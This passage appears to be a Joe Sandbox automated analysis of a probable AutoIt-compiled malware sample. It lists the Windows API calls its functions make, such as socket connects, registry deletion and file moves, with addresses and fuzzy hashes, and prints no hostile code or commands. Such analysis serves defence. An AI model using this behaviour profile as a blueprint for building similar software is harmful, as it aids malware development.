                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ErrorMode$AddressCreateInstanceProc
                    • String ID: ,,}$DllGetClassObject
                    • API String ID: 753597075-3102866830
                    • Opcode ID: 95234b0b5aa39459c5bec4c14192e92afc723eaf4dd867d442d8872fb792cf07
                    • Instruction ID: 90823a02f4ca3c37f890400dd8333bb1436af14033872b77ef078ddd3a611282
                    • Opcode Fuzzy Hash: 95234b0b5aa39459c5bec4c14192e92afc723eaf4dd867d442d8872fb792cf07
                    • Instruction Fuzzy Hash: A34173B1600208EFDF25CF55D884A9A7BBAEF44350F1580AEED059F205D7B9DD44DBA0
                    APIs
                      • Part of subcall function 007A48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007A38D3,?), ref: 007A48C7
                      • Part of subcall function 007A48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007A38D3,?), ref: 007A48E0
                    • lstrcmpiW.KERNEL32(?,?), ref: 007A38F3
                    • _wcscmp.LIBCMT ref: 007A390F
                    • MoveFileW.KERNEL32(?,?), ref: 007A3927
                    • _wcscat.LIBCMT ref: 007A396F
                    • SHFileOperationW.SHELL32(?), ref: 007A39DB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                    • String ID: \*.*
                    • API String ID: 1377345388-1173974218
                    • Opcode ID: ff396776b7224d9855497e0bc3ea9c0bcac7025839e42b06517b7f41f0750f56
                    • Instruction ID: 35906942c65a66e11a8619dbe45c4e7caa15a8655528c42b05fe0898aee672e9
                    • Opcode Fuzzy Hash: ff396776b7224d9855497e0bc3ea9c0bcac7025839e42b06517b7f41f0750f56
                    • Instruction Fuzzy Hash: C7417EB250C3849AC755EF64C4859EBB7E8AFC9344F000A2EB48AC3151EB7DE649C752
                    APIs
                    • _memset.LIBCMT ref: 007C7519
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007C75C0
                    • IsMenu.USER32(?), ref: 007C75D8
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007C7620
                    • DrawMenuBar.USER32 ref: 007C7633
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Menu$Item$DrawInfoInsert_memset
                    • String ID: 0
                    • API String ID: 3866635326-4108050209
                    • Opcode ID: 366a9ee8e53184603213ccc64e4331a8af3842ffd211bfd602faeae92e9d87ad
                    • Instruction ID: 6e292fd27c2fd8aac3e4d5fbdd21cba43513a23c5378f7b96d61705732d97703
                    • Opcode Fuzzy Hash: 366a9ee8e53184603213ccc64e4331a8af3842ffd211bfd602faeae92e9d87ad
                    • Instruction Fuzzy Hash: C9412975A04609EFDB14DF54E885E9ABBF9FB04310F04812DE915A7250DB34AD60CF90
                    APIs
                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 007C125C
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007C1286
                    • FreeLibrary.KERNEL32(00000000), ref: 007C133D
                      • Part of subcall function 007C122D: RegCloseKey.ADVAPI32(?), ref: 007C12A3
                      • Part of subcall function 007C122D: FreeLibrary.KERNEL32(?), ref: 007C12F5
                      • Part of subcall function 007C122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 007C1318
                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 007C12E0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                    • String ID:
                    • API String ID: 395352322-0
                    • Opcode ID: ee7f67177ea491ea9ec7c994ff78816159ab315a8a3df5e76be0670408f9a739
                    • Instruction ID: cbfe36349fa1abc49b1514ecd3a1be04a02fa9d70ad95d56ed86a7eed25e2ce2
                    • Opcode Fuzzy Hash: ee7f67177ea491ea9ec7c994ff78816159ab315a8a3df5e76be0670408f9a739
                    • Instruction Fuzzy Hash: 30311AB5901119BFDB149B90DC89EFEB7BCEF09304F40417DE501E2152EB789E859BA4
                    APIs
                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 007C655B
                    • GetWindowLongW.USER32(01685788,000000F0), ref: 007C658E
                    • GetWindowLongW.USER32(01685788,000000F0), ref: 007C65C3
                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 007C65F5
                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 007C661F
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 007C6630
                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 007C664A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: LongWindow$MessageSend
                    • String ID:
                    • API String ID: 2178440468-0
                    • Opcode ID: 756848dbdf07da931597e462ad3dd0c7313d945fa0ea05ae811b912d6b88998b
                    • Instruction ID: 5f442b175042aaae9da2674affee27b2cdecb7cf7142b2fab27fb1d5e46cf8a0
                    • Opcode Fuzzy Hash: 756848dbdf07da931597e462ad3dd0c7313d945fa0ea05ae811b912d6b88998b
                    • Instruction Fuzzy Hash: 0031F230604251AFDB208F18ECC5F653BE2FB4A714F2941ACF6119B2B6CB79E860DB51
                    APIs
                      • Part of subcall function 007B80A0: inet_addr.WSOCK32(00000000), ref: 007B80CB
                    • socket.WSOCK32(00000002,00000001,00000006), ref: 007B64D9
                    • WSAGetLastError.WSOCK32(00000000), ref: 007B64E8
                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007B6521
                    • connect.WSOCK32(00000000,?,00000010), ref: 007B652A
                    • WSAGetLastError.WSOCK32 ref: 007B6534
                    • closesocket.WSOCK32(00000000), ref: 007B655D
                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007B6576
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                    • String ID:
                    • API String ID: 910771015-0
                    • Opcode ID: 5091122fec54d794ee2ace699e3c1900fdf36d03f81eebcccaa87865a5f9a8e3
                    • Instruction ID: dd251e40aa15cbc26dc46ba00d6d4e0e1d5e6d2434fc490df8e9ca35459ff855
                    • Opcode Fuzzy Hash: 5091122fec54d794ee2ace699e3c1900fdf36d03f81eebcccaa87865a5f9a8e3
                    • Instruction Fuzzy Hash: 25317071600118ABDB10AF24DC89FFA7BADEF45714F048069FA05A7291DB7CAD14CBA1
                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0079E0FA
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0079E120
                    • SysAllocString.OLEAUT32(00000000), ref: 0079E123
                    • SysAllocString.OLEAUT32 ref: 0079E144
                    • SysFreeString.OLEAUT32 ref: 0079E14D
                    • StringFromGUID2.OLE32(?,?,00000028), ref: 0079E167
                    • SysAllocString.OLEAUT32(?), ref: 0079E175
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                    • String ID:
                    • API String ID: 3761583154-0
                    • Opcode ID: 5ba794a12c74e57d53f980658af7b2578b1cf0d6bc2c9cc193dcc9666469291f
                    • Instruction ID: cf20648179013a51dbc2df4094612ea6caca6d642fc52b7e1f8a5bb8a6eeb4c0
                    • Opcode Fuzzy Hash: 5ba794a12c74e57d53f980658af7b2578b1cf0d6bc2c9cc193dcc9666469291f
                    • Instruction Fuzzy Hash: 5E213E35604208AFDF10DFA8EC88DAB77EDEB09760B548139F915CB260DA79DD418B64
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                    • API String ID: 1038674560-2734436370
                    • Opcode ID: d1056bf3101cbb1b89c9b204018e45fec15cd31092a267d9c464479baa6192f8
                    • Instruction ID: 3abf143fa19bad792b2ed5cbfbf2a70c5ab8edda8603bf30611c8150145cb23c
                    • Opcode Fuzzy Hash: d1056bf3101cbb1b89c9b204018e45fec15cd31092a267d9c464479baa6192f8
                    • Instruction Fuzzy Hash: 022167B2204650E6DB30EA30FC16EA77398DF52308F148036FC86C7182EB5DA982D2A1
                    APIs
                      • Part of subcall function 00741D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00741D73
                      • Part of subcall function 00741D35: GetStockObject.GDI32(00000011), ref: 00741D87
                      • Part of subcall function 00741D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00741D91
                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007C78A1
                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007C78AE
                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007C78B9
                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007C78C8
                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007C78D4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: MessageSend$CreateObjectStockWindow
                    • String ID: Msctls_Progress32
                    • API String ID: 1025951953-3636473452
                    • Opcode ID: 9d0b9e1f6cc50b083413a8439e64752df6a80b24e9d7558b745d48a7dae360c9
                    • Instruction ID: 61497c25623c2be0e9ef22eafe773013d3bc5b631bad23e2f7340be676ea95aa
                    • Opcode Fuzzy Hash: 9d0b9e1f6cc50b083413a8439e64752df6a80b24e9d7558b745d48a7dae360c9
                    • Instruction Fuzzy Hash: 20118EB2510219BFEF159E60CC85EE77F6DEF08768F014119FB04A2090CB769C21DBA4
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00764292,?), ref: 007641E3
                    • GetProcAddress.KERNEL32(00000000), ref: 007641EA
                    • EncodePointer.KERNEL32(00000000), ref: 007641F6
                    • DecodePointer.KERNEL32(00000001,00764292,?), ref: 00764213
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoInitialize$combase.dll
                    • API String ID: 3489934621-340411864
                    • Opcode ID: d7710ead828d1b6c9b9df05c0eafef3a09f7c6a4b91d57cfb5d411ffb8738413
                    • Instruction ID: a2bdada31b4880c5ad06118be6aeb9f90ec5a55ea3ae4029fdddeeb1ea32fc6e
                    • Opcode Fuzzy Hash: d7710ead828d1b6c9b9df05c0eafef3a09f7c6a4b91d57cfb5d411ffb8738413
                    • Instruction Fuzzy Hash: 5DE01AF06D0340AFEB606BB0EC0DF043AA6B761B02F109428FA12D51A0DBBE4096CF04
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,007641B8), ref: 007642B8
                    • GetProcAddress.KERNEL32(00000000), ref: 007642BF
                    • EncodePointer.KERNEL32(00000000), ref: 007642CA
                    • DecodePointer.KERNEL32(007641B8), ref: 007642E5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoUninitialize$combase.dll
                    • API String ID: 3489934621-2819208100
                    • Opcode ID: 79c3aed1890fb2d6fc0d2eaa85fb609d178d94432ba7333986cb699fb2f88a11
                    • Instruction ID: f1263e1cdd8bc453698ee793f206382f5940e163b71952c4d29e75daf11a4af6
                    • Opcode Fuzzy Hash: 79c3aed1890fb2d6fc0d2eaa85fb609d178d94432ba7333986cb699fb2f88a11
                    • Instruction Fuzzy Hash: D8E0B6B86C1300AFEB509B61EC0DF053BA6B725742F20902AF601E11A0CBBC4545CA18
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: _memmove$__itow__swprintf
                    • String ID:
                    • API String ID: 3253778849-0
                    • Opcode ID: dd9f741a82659a823d4949ee15d748aae4244aa3bc9c2687c19c610e119a32c9
                    • Instruction ID: 4372021567804b7caedbba176daefdfd24f37961e123e7dcb2f434cb5d978950
                    • Opcode Fuzzy Hash: dd9f741a82659a823d4949ee15d748aae4244aa3bc9c2687c19c610e119a32c9
                    • Instruction Fuzzy Hash: 62619E7050465ADBCF15EF20CC89EFF37A8AF86308F484619F9565B292DB3CA941CB91
                    APIs
                      • Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82
                      • Part of subcall function 007C10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007C0038,?,?), ref: 007C10BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007C0548
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007C0588
                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007C05AB
                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007C05D4
                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 007C0617
                    • RegCloseKey.ADVAPI32(00000000), ref: 007C0624
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                    • String ID:
                    • API String ID: 4046560759-0
                    • Opcode ID: e3038592c8d320cfd3e6f0b7c819b8b7cc1e1b9c4550054d73f0802419e6d139
                    • Instruction ID: 7b9da34c6bba837485368fa470703942797f2d5de764c2e0e7b3a3058d9b317e
                    • Opcode Fuzzy Hash: e3038592c8d320cfd3e6f0b7c819b8b7cc1e1b9c4550054d73f0802419e6d139
                    • Instruction Fuzzy Hash: 3D515B31208200DFCB14EF24D889E6BBBE9FF85714F04891DF545972A2DB39E914CB92
                    APIs
                    • GetMenu.USER32(?), ref: 007C5A82
                    • GetMenuItemCount.USER32(00000000), ref: 007C5AB9
                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007C5AE1
                    • GetMenuItemID.USER32(?,?), ref: 007C5B50
                    • GetSubMenu.USER32(?,?), ref: 007C5B5E
                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 007C5BAF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Menu$Item$CountMessagePostString
                    • String ID:
                    • API String ID: 650687236-0
                    • Opcode ID: cab4049d25ccfbb5e7b3cf4e7be219b3c1d5d5866f899beafed09a28c788457c
                    • Instruction ID: a05f3b84c21065d6d53a2293c26c851cfb8f2ceaaae01d8b10cc9883faac15cc
                    • Opcode Fuzzy Hash: cab4049d25ccfbb5e7b3cf4e7be219b3c1d5d5866f899beafed09a28c788457c
                    • Instruction Fuzzy Hash: 4F517C71A00615EFCF119F64C849EAEBBB5EF48310F14846DE902B7351CB79BE818B90
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 0079F3F7
                    • VariantClear.OLEAUT32(00000013), ref: 0079F469
                    • VariantClear.OLEAUT32(00000000), ref: 0079F4C4
                    • _memmove.LIBCMT ref: 0079F4EE
                    • VariantClear.OLEAUT32(?), ref: 0079F53B
                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0079F569
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Variant$Clear$ChangeInitType_memmove
                    • String ID:
                    • API String ID: 1101466143-0
                    • Opcode ID: fc8f66f1386676552e985a4082975e95808b32ac4310dba31537806b1e4b5f9d
                    • Instruction ID: e2d15f042882cbc0fe7161fd1d638da9425ec03ca4cce67600c3ed781136aa26
                    • Opcode Fuzzy Hash: fc8f66f1386676552e985a4082975e95808b32ac4310dba31537806b1e4b5f9d
